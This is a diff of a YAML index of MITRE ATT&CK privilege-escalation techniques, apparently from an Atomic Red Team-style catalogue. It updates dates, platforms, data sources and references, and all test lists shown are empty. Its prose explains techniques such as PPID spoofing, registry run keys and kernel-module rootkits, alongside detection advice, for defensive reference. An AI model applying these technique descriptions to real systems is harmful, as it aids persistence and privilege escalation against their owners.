@@ -19611,13 +19918,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -19643,10 +19953,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -19655,10 +19973,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19675,9 +20003,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -19741,7 +20066,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -19830,7 +20154,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -19888,7 +20211,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -19913,12 +20236,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -19944,7 +20266,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -19958,7 +20279,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -19985,8 +20305,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -19997,7 +20317,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20068,7 +20389,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20095,7 +20416,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20135,7 +20455,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20155,12 +20475,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20214,11 +20533,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20305,9 +20623,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20320,12 +20638,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20361,16 +20678,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20411,143 +20727,141 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -20584,7 +20898,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20610,12 +20924,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -20693,9 +21005,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
